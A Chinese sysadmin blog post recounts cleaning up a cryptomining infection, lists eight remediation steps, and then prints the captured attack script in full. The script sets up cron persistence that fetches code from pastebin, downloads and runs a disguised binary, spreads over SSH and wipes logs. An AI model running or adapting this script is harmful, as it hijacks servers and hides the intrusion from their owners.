最近服务器受到挖矿攻击，在此记录分享一下处理经验。
zabbix收到报警，cpu满负载运作，登陆服务器top查看到用户进程占用cpu高达99.9%，锁定可疑进程后与开发人员对接一下，确定是恶意程序。
1.利用lsof可以找到该进程打开的所有文件
2.通过iptables或者firewalls防火墙手段封死攻击者地址
3.rm -rf 清楚除挖矿程序
4.crontab  删除挖矿定时任务
5.根据挖矿脚本检查用户列表，开机启动，.ssh文件
6.pkill 杀掉挖矿程序的进程
7.去控制台设置安全组关闭不安全端口
8.对系统和web进行安全测试，对系统漏洞进行修复.

附挖矿脚本：
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  3990    0  3990    0     0   3740      0 --:--:--  0:00:01 --:--:--  3739
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/wDBa7jCQ||wget -q -O- https://pastebin.com/raw/wDBa7jCQ)|sh" | crontab -

mkdir -p /tmp
chmod 1777 /tmp

ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "watchdog"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "watchdogs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ksoftirqds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9
ps aux|grep -v grep|grep -v kintegrityds|awk '{if($3>=80.0) print $2}'|xargs kill -9
apt-get install cron -y||yum install crontabs -y||apk add cron -y

if [ ! -f "/tmp/.iCEunix" ]; then
    ARCH=$(uname -m)
    if [ ${ARCH}x = "x86_64x" ]; then
        (curl -fsSL http://sowcar.com/t6/681/1552493541x2890191859.jpg -o /tmp/kpsmouseds||wget -q http://sowcar.com/t6/681/1552493541x2890191859.jpg -O /tmp/kpsmouseds) && chmod +x /tmp/kpsmouseds
    elif [ ${ARCH}x = "i686x" ]; then
        (curl -fsSL http://sowcar.com/t6/681/1552493613x2890191853.jpg -o /tmp/kpsmouseds||wget -q http://sowcar.com/t6/681/1552493613x2890191853.jpg -O /tmp/kpsmouseds) && chmod +x /tmp/kpsmouseds
    else
        (curl -fsSL http://sowcar.com/t6/681/1552493613x2890191853.jpg -o /tmp/kpsmouseds||wget -q http://sowcar.com/t6/681/1552493613x2890191853.jpg -O /tmp/kpsmouseds) && chmod +x /tmp/kpsmouseds
    fi
        /tmp/kpsmouseds
elif [ ! -f "/proc/$(cat /tmp/.iCEunix)/stat" ]; then
    ARCH=$(uname -m)
    if [ ${ARCH}x = "x86_64x" ]; then
        (curl -fsSL http://sowcar.com/t6/681/1552493541x2890191859.jpg -o /tmp/kpsmouseds||wget -q http://sowcar.com/t6/681/1552493541x2890191859.jpg -O /tmp/kpsmouseds) && chmod +x /tmp/kpsmouseds
    elif [ ${ARCH}x = "i686x" ]; then
        (curl -fsSL http://sowcar.com/t6/681/1552493613x2890191853.jpg -o /tmp/kpsmouseds||wget -q http://sowcar.com/t6/681/1552493613x2890191853.jpg -O /tmp/kpsmouseds) && chmod +x /tmp/kpsmouseds
    else
        (curl -fsSL http://sowcar.com/t6/681/1552493613x2890191853.jpg -o /tmp/kpsmouseds||wget -q http://sowcar.com/t6/681/1552493613x2890191853.jpg -O /tmp/kpsmouseds) && chmod +x /tmp/kpsmouseds
    fi
        /tmp/kpsmouseds
fi

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/wDBa7jCQ||wget -q -O- https://pastebin.com/raw/wDBa7jCQ)|sh >/dev/null 2>&1 &' & done
fi

echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
